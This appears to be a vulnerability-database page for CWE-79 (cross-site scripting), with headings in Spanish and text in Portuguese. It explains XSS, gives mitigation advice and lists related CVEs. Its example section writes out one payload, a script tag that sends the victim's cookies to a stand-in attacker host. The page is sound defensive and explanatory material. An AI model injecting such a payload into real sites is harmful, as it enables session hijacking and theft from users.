Fallos del tipo CWE-79

28.612 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2022-1559—Clipr <= 1.2.3 - Admin+ Stored Cross-Site ScriptingEPSS 1.0%CVE-2020-2494—Cross-site Scripting Vulnerability in Music StationEPSS 1.0%CVE-2020-2491—Cross-site Scripting Vulnerability in Photo StationEPSS 1.0%CVE-2024-30047HIGHDynamics 365 Customer Insights Spoofing VulnerabilityEPSS 1.0%CVE-2022-4865HIGHCross-site Scripting (XSS) - Stored in usememos/memosEPSS 1.0%CVE-2022-4866CRITICALCross-site Scripting (XSS) - Stored in usememos/memosEPSS 1.0%CVE-2023-25837HIGHBUG-000133088 - ArcGIS Enterprise site builder is subject to stored XSS.EPSS 1.0%CVE-2024-30048HIGHDynamics 365 Customer Insights Spoofing VulnerabilityEPSS 1.0%CVE-2017-8440—Starting in version 5.3.0, Kibana had a cross-site scripting (XSS) vulnerability in the Discover page that could allow an attacker to obtainEPSS 1.0%CVE-2017-8439—Kibana version 5.4.0 was affected by a Cross Site Scripting (XSS) bug in the Time Series Visual Builder. This bug could allow an attacker toEPSS 1.0%CVE-2021-39356MEDIUMContent Staging <= 2.0.1 Authenticated Stored Cross-Site ScriptingEPSS 1.0%CVE-2022-1504MEDIUMXSS in /demo/module/?module=HERE in microweber/microweberEPSS 1.0%CVE-2021-39355MEDIUMIndeed Job Importer <= 1.0.5 Authenticated Stored Cross-Site ScriptingEPSS 1.0%CVE-2022-23598MEDIUMReflected XSS vulnerability when rendering error messages in laminas-formEPSS 1.0%CVE-2024-11325MEDIUMAWeber Forms by Optin Cat <= 2.5.7 - Reflected Cross-Site ScriptingEPSS 1.0%CVE-2023-4636MEDIUMWordPress File Sharing Plugin <= 2.0.3 - Authenticated (Admin+) Stored Cross-Site ScriptingEPSS 1.0%CVE-2021-33611MEDIUMReflected cross-site scripting in vaadin-menu-bar webjar resources in Vaadin 14EPSS 1.0%CVE-2015-20105—ClickBank Affiliate Ads <= 1.20 - CSRF to Stored Cross-Site ScriptingEPSS 1.0%CVE-2023-5538HIGHMpOperationLogs <= 1.0.1 - Unauthenticated Stored Cross-Site ScriptingEPSS 1.0%CVE-2019-10178MEDIUMIt was found that the Token Processing Service (TPS) did not properly sanitize the Token IDs from the "Activity" page, enabling a Stored CroEPSS 1.0%